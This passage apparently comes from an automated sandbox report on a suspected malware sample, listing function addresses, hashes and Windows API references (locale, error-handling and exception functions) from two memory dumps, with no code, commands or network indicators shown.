Snapshot File: hcaresult_0_2_2470000_7gxaFDUSOD.jbxd

Yara matches

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: 5e7a358d5f0fcd19f7a1f5c916dd47094927e45ce0fce04ddfdee5a2d3ebffdf
Instruction ID: a3fff2fd7053afa5b0704e78949c652652a7e07a9cad83244e716aa3a97a675d
Opcode Fuzzy Hash: 5e7a358d5f0fcd19f7a1f5c916dd47094927e45ce0fce04ddfdee5a2d3ebffdf
Instruction Fuzzy Hash: D4E04635000148ABCF126F54DD18B493B6AEB12B42F008029F9048B270CB36DA42DE40

Function 0247092B Relevance: 3.8, Strings: 3, Instructions: 90COMMON

Download Yara Rule

Strings

., xrefs: 0247095F
GetProcAddress., xrefs: 024709DC, 024709DF, 024709E4
l, xrefs: 02470966

Memory Dump Source

Source File: 00000000.00000002.3888004669.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_7gxaFDUSOD.jbxd

Yara matches

Similarity

API ID:
String ID: .$GetProcAddress.$l
API String ID: 0-2784972518
Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
Instruction ID: 2ba03358afb4aa586080315134d9a6fa806d0697afe7ce4ec3d947c4ea805d1a
Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
Instruction Fuzzy Hash: AB3147B6911609DFDB10CF99C880AEEBBF9FF48324F15504AD851A7310D771EA45CBA4

Function 004389F2 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 127COMMON

Download Yara Rule

Strings

/, xrefs: 00438ABC

Memory Dump Source

Source File: 00000000.00000002.3887397699.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7gxaFDUSOD.jbxd

Similarity

API ID:
String ID: /
API String ID: 0-2043925204
Opcode ID: 9f35882ade819549731607cbebdcf7e443c3af80474b374bb13d2dd880a55ca5
Instruction ID: b1d1c733bd69e792f2c7091433d2a564ecb1a1065cd437496777377bd66813c7
Opcode Fuzzy Hash: 9f35882ade819549731607cbebdcf7e443c3af80474b374bb13d2dd880a55ca5
Instruction Fuzzy Hash: 1A412B725003196FCB20AFB9DC49EBBB778EB88714F50566EF905D7280EA34AD41CB58

Function 024A8C59 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 127COMMON

Download Yara Rule

Strings

/, xrefs: 024A8D23

Memory Dump Source

Source File: 00000000.00000002.3888004669.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_7gxaFDUSOD.jbxd

Yara matches

Similarity

API ID:
String ID: /
API String ID: 0-2043925204
Opcode ID: 214cb01e33ec6b9459e4b79cb8e50baccc65f9bab5c6278872b1ce9ffd0fa8ee
Instruction ID: 4335d11f19da45b4f0d673e3307594e1e8481ed3d74476d8340771aad8037b0d
Opcode Fuzzy Hash: 214cb01e33ec6b9459e4b79cb8e50baccc65f9bab5c6278872b1ce9ffd0fa8ee
Instruction Fuzzy Hash: 4F412772900219AFCB209FB9CC98EAB7BB9EF94714F50466EF905D7280E7319D81CB50

Function 004351C0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 37COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,00430213,?,00000004), ref: 00435213

Strings

GetLocaleInfoEx, xrefs: 004351D1, 004351DB

Memory Dump Source

Source File: 00000000.00000002.3887397699.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7gxaFDUSOD.jbxd

Similarity

API ID: InfoLocale
String ID: GetLocaleInfoEx
API String ID: 2299586839-2904428671
Opcode ID: 64730f8190c419499ef2262387837ca1d33de23438e6729a1ee39c968f658f2e
Instruction ID: 6c622d5e0ad0a6d1c05e93c1424bc95a701370efe176ef79413d4e55be9de99b
Opcode Fuzzy Hash: 64730f8190c419499ef2262387837ca1d33de23438e6729a1ee39c968f658f2e
Instruction Fuzzy Hash: 97F02B31680318BBDB016F51CC02F6F7B21EF18B02F10006BFC0567290DA799E20AADE

Function 0249ED47 Relevance: 3.5, APIs: 2, Instructions: 464COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3888004669.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_7gxaFDUSOD.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0f0c45cb1db73e70c4158069b4bc17042fea2514ea4053169c41fd5e4a69dae0
Instruction ID: 0e7d969b980ba6dfd04e8a54758ca7fe4a2fce6f8c0d4c53bda4dffab6b2fe6b
Opcode Fuzzy Hash: 0f0c45cb1db73e70c4158069b4bc17042fea2514ea4053169c41fd5e4a69dae0
Instruction Fuzzy Hash: E3021A71E002199BDF14CFA9C9806AEBBF5EF88314F25826AD919E7384D731A945CF80

Function 02472605 Relevance: 3.1, APIs: 2, Instructions: 125nativewindowCOMMON

Download Yara Rule

APIs

NtdllDefWindowProc_W.NTDLL(?,?,?,?), ref: 0247262C
PostQuitMessage.USER32(00000000), ref: 024727CA

Memory Dump Source

Source File: 00000000.00000002.3888004669.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_7gxaFDUSOD.jbxd

Yara matches

Similarity

API ID: MessageNtdllPostProc_QuitWindow
String ID:
API String ID: 4264772764-0
Opcode ID: e934076550e84698602cd97162307a7d632c652edc7a108d85d40228a86a25f4
Instruction ID: 87c017268568291181d22e74da28774018b180f19e1a84941c1995f0bc980cca
Opcode Fuzzy Hash: e934076550e84698602cd97162307a7d632c652edc7a108d85d40228a86a25f4
Instruction Fuzzy Hash: E941412596438095E730FFA5BC45B6633B0FF64B22F10252BD528CB2B2E3B28540C75E

Function 00436CBF Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE

Download Yara Rule

APIs

RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00436CBA,?,?,00000008,?,?,0043F17B,00000000), ref: 00436EEC

Memory Dump Source

Source File: 00000000.00000002.3887397699.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7gxaFDUSOD.jbxd

Similarity

API ID: ExceptionRaise
String ID:
API String ID: 3997070919-0
Opcode ID: 48238cf6710726b9619f53d2e144ba1457a585c9b7e66ee0334f1f17764c4bba
Instruction ID: 64e3da0580c1687aacde15a9aed21cd267913b72937e2db5c37d982a735c0e1f
Opcode Fuzzy Hash: 48238cf6710726b9619f53d2e144ba1457a585c9b7e66ee0334f1f17764c4bba
Instruction Fuzzy Hash: 69B17D35210609EFD714CF28C48AB657BE0FF09324F26D659E899CF2A1C339E992CB44

Function 024A6F26 Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE

Download Yara Rule

APIs

RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,024A6F21,?,?,00000008,?,?,024AF3E2,00000000), ref: 024A7153

Memory Dump Source

Source File: 00000000.00000002.3888004669.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_7gxaFDUSOD.jbxd

Yara matches

Similarity

API ID: ExceptionRaise
String ID:
API String ID: 3997070919-0
Opcode ID: 48238cf6710726b9619f53d2e144ba1457a585c9b7e66ee0334f1f17764c4bba
Instruction ID: b4bead52b7adc43ab3d09d59a5431fe39278b2192eb71e8ab72593d9b896b60c
Opcode Fuzzy Hash: 48238cf6710726b9619f53d2e144ba1457a585c9b7e66ee0334f1f17764c4bba
Instruction Fuzzy Hash: 7DB16F312106089FD725CF28C496B69BBE1FF55368F298659E89ACF3A1C335D992CF40

Function 0043B645 Relevance: 1.6, APIs: 1, Instructions: 83COMMON

Download Yara Rule

APIs

Part of subcall function 00431EDA: GetLastError.KERNEL32(?,?,0042DFE5,00457910,00000010), ref: 00431EDE
Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F11
Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F52

Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F39
Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F46

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0043B699

Memory Dump Source

Source File: 00000000.00000002.3887397699.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7gxaFDUSOD.jbxd

Similarity

API ID: ErrorLast$_free$InfoLocale
String ID:
API String ID: 2955987475-0
Opcode ID: 7810810a637c9db15668f97de096a3c7ef99c71437c6b6a4b8ea3eac9e26399b
Instruction ID: d046272b768734764790121d12bbe36070ecd09619f9604c2cd6a0fe40238023
Opcode Fuzzy Hash: 7810810a637c9db15668f97de096a3c7ef99c71437c6b6a4b8ea3eac9e26399b
Instruction Fuzzy Hash: B421B67251020AABDB249E65CC42BBB73A8EF48314F10107BFE01D6281EB79DD44CB99

Function 024AB8AC Relevance: 1.6, APIs: 1, Instructions: 83COMMON

Download Yara Rule

APIs

Part of subcall function 024A2141: GetLastError.KERNEL32(?,?,0249A9EC,?,00000000,?,0249CDE6,0247247E,00000000,?,00451F20), ref: 024A2145
Part of subcall function 024A2141: _free.LIBCMT ref: 024A2178
Part of subcall function 024A2141: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 024A21B9

Part of subcall function 024A2141: _free.LIBCMT ref: 024A21A0
Part of subcall function 024A2141: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 024A21AD

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 024AB900

Memory Dump Source

Source File: 00000000.00000002.3888004669.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_7gxaFDUSOD.jbxd

Yara matches

Similarity

API ID: ErrorLast$_free$InfoLocale
String ID:
API String ID: 2955987475-0
Opcode ID: 8d1e0dff99db69fa77e1a690083a2ab2b0404bead7d8da99940a9befd189831e
Instruction ID: 894950bf890e9071168e19fddc440ec9a2c25e4b603c106ed9c8f004616b7ee1
Opcode Fuzzy Hash: 8d1e0dff99db69fa77e1a690083a2ab2b0404bead7d8da99940a9befd189831e
Instruction Fuzzy Hash: BD21BE7295020AABDF24AE25DC61BBA77ADFF24318F00017FED01D6251EB799944DB50

Function 0043B2CD Relevance: 1.6, APIs: 1, Instructions: 63COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00431EDA: GetLastError.KERNEL32(?,?,0042DFE5,00457910,00000010), ref: 00431EDE
Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F11
Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F52

EnumSystemLocalesW.KERNEL32(0043B3F5,00000001,00000000,?,004307B5,?,0043BA22,00000000,?,?,?), ref: 0043B33F

Memory Dump Source

Source File: 00000000.00000002.3887397699.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7gxaFDUSOD.jbxd

Similarity

API ID: ErrorLast$EnumLocalesSystem_free
String ID:
API String ID: 2016158738-0
Opcode ID: 209f9151615a4c87f00d4ea0f4f536091c38e7646036be2875dd2bb4f2ddf691
Instruction ID: 7307f244e070286786186ca11be292e9958ff85af34fd5d1bf47ea8df294ed07
Opcode Fuzzy Hash: 209f9151615a4c87f00d4ea0f4f536091c38e7646036be2875dd2bb4f2ddf691
Instruction Fuzzy Hash: D91106362007019FDB189F3988917BBB791FF84318F15452DEA8687B40D375A902C784

Function 024AB534 Relevance: 1.6, APIs: 1, Instructions: 63COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 024A2141: GetLastError.KERNEL32(?,?,0249A9EC,?,00000000,?,0249CDE6,0247247E,00000000,?,00451F20), ref: 024A2145
Part of subcall function 024A2141: _free.LIBCMT ref: 024A2178
Part of subcall function 024A2141: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 024A21B9

EnumSystemLocalesW.KERNEL32(0043B3F5,00000001,00000000,?,024A0A1C,?,024ABC89,00000000,?,?,?), ref: 024AB5A6

Memory Dump Source

Source File: 00000000.00000002.3888004669.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_7gxaFDUSOD.jbxd

Yara matches

Similarity

API ID: ErrorLast$EnumLocalesSystem_free
String ID:
API String ID: 2016158738-0
Opcode ID: ffafb835184771a8fee8a968cb960d5e6389dd898606227e18ebf87d931cb5f8
Instruction ID: 18d74d8b277ae358da7247cbfdf9b29731e7ca9d151032ff60f35e7071ef560c
Opcode Fuzzy Hash: ffafb835184771a8fee8a968cb960d5e6389dd898606227e18ebf87d931cb5f8
Instruction Fuzzy Hash: 3311E53A2007059FDB189F39C8A16BBBB92FF9475CB19482EDA4687B40D771B542CB40

Function 0043B875 Relevance: 1.5, APIs: 1, Instructions: 46COMMON

Download Yara Rule

APIs

Part of subcall function 00431EDA: GetLastError.KERNEL32(?,?,0042DFE5,00457910,00000010), ref: 00431EDE
Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F11
Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F52

GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,0043B613,00000000,00000000,?), ref: 0043B8A1

Memory Dump Source

Source File: 00000000.00000002.3887397699.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7gxaFDUSOD.jbxd

Similarity

API ID: ErrorLast$InfoLocale_free
String ID:
API String ID: 787680540-0
Opcode ID: d4489b39268ae4454a785e185639656f72d6012a52ca4bd703596e7082c16f5e
Instruction ID: 37b951b57323e1638715454beaabcd8ff4bbdb448c8d666509202632d17d74d0
Opcode Fuzzy Hash: d4489b39268ae4454a785e185639656f72d6012a52ca4bd703596e7082c16f5e
Instruction Fuzzy Hash: 72F0F932910115BFDB2C6A6588057BB776CEF44764F15542FEE05A3280EB39FE4287D8

Function 024ABADC Relevance: 1.5, APIs: 1, Instructions: 46COMMON

Download Yara Rule

APIs

Part of subcall function 024A2141: GetLastError.KERNEL32(?,?,0249A9EC,?,00000000,?,0249CDE6,0247247E,00000000,?,00451F20), ref: 024A2145
Part of subcall function 024A2141: _free.LIBCMT ref: 024A2178
Part of subcall function 024A2141: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 024A21B9

GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,024AB87A,00000000,00000000,?), ref: 024ABB08

Memory Dump Source

Source File: 00000000.00000002.3888004669.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_7gxaFDUSOD.jbxd

Yara matches

Similarity

API ID: ErrorLast$InfoLocale_free
String ID:
API String ID: 787680540-0
Opcode ID: 211d6faacd7aebbddaf1521eced52ad029ab4ad6bdece50ad0f57ab5ad071f03
Instruction ID: 41c5c3d13b33bb4f1284a6ef611b21afcf9bf1ffa1d530003e2f9a81f71f35ca
Opcode Fuzzy Hash: 211d6faacd7aebbddaf1521eced52ad029ab4ad6bdece50ad0f57ab5ad071f03
Instruction Fuzzy Hash: F3F0F432A11115ABDB289A25CC55BBBB768FB6071CF04046AED06A3684EB70BE42C6D0

Function 024AB8A3 Relevance: 1.5, APIs: 1, Instructions: 45COMMON

Download Yara Rule

APIs

Part of subcall function 024A2141: GetLastError.KERNEL32(?,?,0249A9EC,?,00000000,?,0249CDE6,0247247E,00000000,?,00451F20), ref: 024A2145
Part of subcall function 024A2141: _free.LIBCMT ref: 024A2178
Part of subcall function 024A2141: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 024A21B9

Part of subcall function 024A2141: _free.LIBCMT ref: 024A21A0
Part of subcall function 024A2141: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 024A21AD

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 024AB900

Memory Dump Source

Source File: 00000000.00000002.3888004669.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_7gxaFDUSOD.jbxd

Yara matches

Similarity

API ID: ErrorLast$_free$InfoLocale
String ID:
API String ID: 2955987475-0
Opcode ID: d32582cdea7e1768c45f561c62b89e044e33708acaf6235ec9442aa70aeaeee6
Instruction ID: d4cc21cc81864157709254cd03628ddb7e14c23ee8c388b1e900f8b1f02e1da0
Opcode Fuzzy Hash: d32582cdea7e1768c45f561c62b89e044e33708acaf6235ec9442aa70aeaeee6
Instruction Fuzzy Hash: 48014432B51204DBCB14EF74DC90ABA33A9EF18311F0442BFEE02DB281EA759D048B50

Function 0043B368 Relevance: 1.5, APIs: 1, Instructions: 42COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00431EDA: GetLastError.KERNEL32(?,?,0042DFE5,00457910,00000010), ref: 00431EDE
Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F11
Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F52

EnumSystemLocalesW.KERNEL32(0043B645,00000001,?,?,004307B5,?,0043B9E6,004307B5,?,?,?,?,?,004307B5,?,?), ref: 0043B3B4

Memory Dump Source

Source File: 00000000.00000002.3887397699.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7gxaFDUSOD.jbxd

Similarity

API ID: ErrorLast$EnumLocalesSystem_free
String ID:
API String ID: 2016158738-0
Opcode ID: ff4b281e18efaa19658e03831a8d75929bd5cd68572c305843f6b1aa6eea9166
Instruction ID: e409c1f6f572afb8e53c6bef185f66c51efc5fed4ad0f11af6fa15d84cefb54f
Opcode Fuzzy Hash: ff4b281e18efaa19658e03831a8d75929bd5cd68572c305843f6b1aa6eea9166
Instruction Fuzzy Hash: 84F022362007045FDB159F3ADC91B6A7B90EF84328F15442EFE028B680D7B5AC028684

Function 024AB5CF Relevance: 1.5, APIs: 1, Instructions: 42COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 024A2141: GetLastError.KERNEL32(?,?,0249A9EC,?,00000000,?,0249CDE6,0247247E,00000000,?,00451F20), ref: 024A2145
Part of subcall function 024A2141: _free.LIBCMT ref: 024A2178
Part of subcall function 024A2141: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 024A21B9

EnumSystemLocalesW.KERNEL32(0043B645,00000001,?,?,024A0A1C,?,024ABC4D,024A0A1C,?,?,?,?,?,024A0A1C,?,?), ref: 024AB61B

Memory Dump Source

Source File: 00000000.00000002.3888004669.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_7gxaFDUSOD.jbxd

Yara matches

Similarity

API ID: ErrorLast$EnumLocalesSystem_free
String ID:
API String ID: 2016158738-0
Opcode ID: be0c1418a5537eaa7c8022095862ccd701d6029552e7400e1215369425bfd1f6
Instruction ID: a185d91d498a99ac7c5dba8311b9715d276e1c5d042b0f2b32af02cac09110ce
Opcode Fuzzy Hash: be0c1418a5537eaa7c8022095862ccd701d6029552e7400e1215369425bfd1f6
Instruction Fuzzy Hash: 17F0F6363007045FDB245F39DCA1B7B7B95EF9076CF15442EFA058B650D7B198029B44

Function 024A5427 Relevance: 1.5, APIs: 1, Instructions: 37COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,024A047A,?,00000004), ref: 024A547A

Memory Dump Source

Source File: 00000000.00000002.3888004669.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_7gxaFDUSOD.jbxd

Yara matches

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: 07f8c7bf41114017428d2514f108cb7953daff0745a9299ad745c6acdc6e13f2
Instruction ID: 3a034e8758d3c2566f8fc9f6e201ee483d0d5593cc91ff2f68cd3d195e4bbae0
Opcode Fuzzy Hash: 07f8c7bf41114017428d2514f108cb7953daff0745a9299ad745c6acdc6e13f2
Instruction Fuzzy Hash: FAF02B31A80318BFDB015F51CD01F6E7B26EF14F02F80411AFD0566290DA718D20EB89

Function 00434DCD Relevance: 1.5, APIs: 1, Instructions: 34COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0042E3ED: EnterCriticalSection.KERNEL32(?,?,00431C7A,?,00457A38,00000008,00431D48,?,?,?), ref: 0042E3FC

EnumSystemLocalesW.KERNEL32(00434D87,00000001,00457BB8,0000000C), ref: 00434E05

Memory Dump Source

Source File: 00000000.00000002.3887397699.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7gxaFDUSOD.jbxd

Similarity

API ID: CriticalEnterEnumLocalesSectionSystem
String ID:
API String ID: 1272433827-0
Opcode ID: 47d67bb98ae687caab0f152daec36b922070e938420cb95d1256d2dc5184026a
Instruction ID: 538c22e4eb892f32bc8c86ea5e443232934619ae82977abc573478e901e73d8c
Opcode Fuzzy Hash: 47d67bb98ae687caab0f152daec36b922070e938420cb95d1256d2dc5184026a
Instruction Fuzzy Hash: D4F04F32A103009FE710EF69D906B9D77E1AF05726F10416AF910DB2E2CB7999808F49

Function 024A5034 Relevance: 1.5, APIs: 1, Instructions: 34COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0249E654: RtlEnterCriticalSection.NTDLL(02020DAF), ref: 0249E663

EnumSystemLocalesW.KERNEL32(00434D87,00000001,00457BB8,0000000C), ref: 024A506C

Memory Dump Source

Source File: 00000000.00000002.3888004669.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_7gxaFDUSOD.jbxd

Yara matches

Similarity

API ID: CriticalEnterEnumLocalesSectionSystem
String ID:
API String ID: 1272433827-0
Opcode ID: 149a1b447c4ca571c705eb83a82105c6c8b5f7f3924206eb96c0dadbe136b747
Instruction ID: 275d1a892d870f1ca76b650ef4b51d2880c8a371f56df8ba81daaf226e8273a2
Opcode Fuzzy Hash: 149a1b447c4ca571c705eb83a82105c6c8b5f7f3924206eb96c0dadbe136b747
Instruction Fuzzy Hash: A9F03C32A20304DBEB10EF69D905B5D7BE1AF15721F10416AF900DB2A1CB759944CF49

Function 0043B282 Relevance: 1.5, APIs: 1, Instructions: 31COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00431EDA: GetLastError.KERNEL32(?,?,0042DFE5,00457910,00000010), ref: 00431EDE
Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F11
Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F52

EnumSystemLocalesW.KERNEL32(0043B1D9,00000001,?,?,?,0043BA44,004307B5,?,?,?,?,?,004307B5,?,?,?), ref: 0043B2B9

Memory Dump Source

Source File: 00000000.00000002.3887397699.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7gxaFDUSOD.jbxd

Similarity

API ID: ErrorLast$EnumLocalesSystem_free
String ID:
API String ID: 2016158738-0
Opcode ID: d795fd725da8cf926aceeb2c3e7fa24b7794cc6b9bd948e6377232035fe4f002
Instruction ID: ec76e124c96d5fb6d75208995366108955e3ecd697e122142a5eb02f601840fd
Opcode Fuzzy Hash: d795fd725da8cf926aceeb2c3e7fa24b7794cc6b9bd948e6377232035fe4f002
Instruction Fuzzy Hash: C8F0553A30020897CB089F7BE81976BBF90EFC5754F0A409EEF098B290C3399942C794

Function 024AB4E9 Relevance: 1.5, APIs: 1, Instructions: 31COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 024A2141: GetLastError.KERNEL32(?,?,0249A9EC,?,00000000,?,0249CDE6,0247247E,00000000,?,00451F20), ref: 024A2145
Part of subcall function 024A2141: _free.LIBCMT ref: 024A2178
Part of subcall function 024A2141: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 024A21B9

EnumSystemLocalesW.KERNEL32(0043B1D9,00000001,?,?,?,024ABCAB,024A0A1C,?,?,?,?,?,024A0A1C,?,?,?), ref: 024AB520

Memory Dump Source

Source File: 00000000.00000002.3888004669.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_7gxaFDUSOD.jbxd

Yara matches

Similarity

API ID: ErrorLast$EnumLocalesSystem_free
String ID:
API String ID: 2016158738-0
Opcode ID: 17a3dc99c73c840853923c14692af3efa017a2bf6fb03d58d7281da58e8ea8e8
Instruction ID: 3579ef75552df262562f64ed2d03fba6be7e3c6fede81762f97e666ce92e754b
Opcode Fuzzy Hash: 17a3dc99c73c840853923c14692af3efa017a2bf6fb03d58d7281da58e8ea8e8
Instruction Fuzzy Hash: 9BF0553A30020857CB089F36DC2476BBF90EFC1B54B0A005EEF098B290C3719842C790

Function 00410666 Relevance: 1.5, APIs: 1, Instructions: 3COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_00010672,0040FBF9), ref: 0041066B

Memory Dump Source

Source File: 00000000.00000002.3887397699.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7gxaFDUSOD.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: b15aee9717d6502a1a2a20d9443c42d18a3a581c825a371cb40572de9e709067
Instruction ID: fa39807fe97804f53db995cd18131740e6dead46809b56a5c9e59eb8483b0dbe
Opcode Fuzzy Hash: b15aee9717d6502a1a2a20d9443c42d18a3a581c825a371cb40572de9e709067
Instruction Fuzzy Hash:

Function 024808CD Relevance: 1.5, APIs: 1, Instructions: 3COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(00410672,0247FE60), ref: 024808D2

Memory Dump Source

Source File: 00000000.00000002.3888004669.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_7gxaFDUSOD.jbxd

Yara matches

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: b15aee9717d6502a1a2a20d9443c42d18a3a581c825a371cb40572de9e709067
Instruction ID: fa39807fe97804f53db995cd18131740e6dead46809b56a5c9e59eb8483b0dbe
Opcode Fuzzy Hash: b15aee9717d6502a1a2a20d9443c42d18a3a581c825a371cb40572de9e709067
Instruction Fuzzy Hash:

Function 0043BBC1 Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 0043BBC1

Memory Dump Source

Source File: 00000000.00000002.3887397699.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7gxaFDUSOD.jbxd

Similarity

API ID: HeapProcess
String ID:
API String ID: 54951025-0
Opcode ID: b4ea6d87a370488c09fcd641e95d7d939a449e6ed78a54530fece2258cf524d5
Instruction ID: 646215492ee1b006629ac518ce4a11708067c45d14fae9e363609ac2be79142b
Opcode Fuzzy Hash: b4ea6d87a370488c09fcd641e95d7d939a449e6ed78a54530fece2258cf524d5
Instruction Fuzzy Hash: 3FA02230A00300EF8380CF30AE0830E3BE8BE03AC3B008238A002C3030EB30C0808B08

Function 004373D9 Relevance: .6, Instructions: 637COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3887397699.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7gxaFDUSOD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 833578221895711969fd992aca003b8dff0ac6b0b4e24d9bd8e499997b964946
Instruction ID: 2844b30024e45351147ede59872166b67bb7d3639a7d84f230d679a3a0c0a750
Opcode Fuzzy Hash: 833578221895711969fd992aca003b8dff0ac6b0b4e24d9bd8e499997b964946
Instruction Fuzzy Hash: 32325761D69F014DE733A634C822336A258AFBB3D4F15E737E85AB5EA5EB2CC4834105

Function 004071AB Relevance: .4, Instructions: 378COMMON

Download Yara Rule

Memory Dump Source

